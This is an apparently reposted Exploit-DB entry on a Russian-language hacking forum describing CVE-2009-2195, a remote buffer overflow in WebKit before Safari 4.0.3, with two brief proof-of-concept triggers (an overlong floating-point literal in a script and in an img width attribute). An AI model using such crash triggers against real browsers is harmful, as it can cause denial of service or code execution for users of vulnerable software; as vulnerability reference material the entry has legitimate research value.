Exploit WebKit - Floating Point Number Remote Buffer Overflow

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
33164
Проверка EDB
  1. Пройдено
Автор
APPLE
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2009-2195
Дата публикации
2009-08-11
Код:
source: https://www.securityfocus.com/bid/36023/info

WebKit is prone to a remote buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Versions prior to Apple Safari 4.0.3 are vulnerable; other applications using WebKit may also be affected. 


Example 1:
---------
<script>
var Overflow = "31337" + 0.313373133731337313373133731337...;
</script>
---------

Example 2:
---------
<img width=0.3133731337313373133731337... src="31337.jpg">
---------
 
Источник
www.exploit-db.com

Похожие темы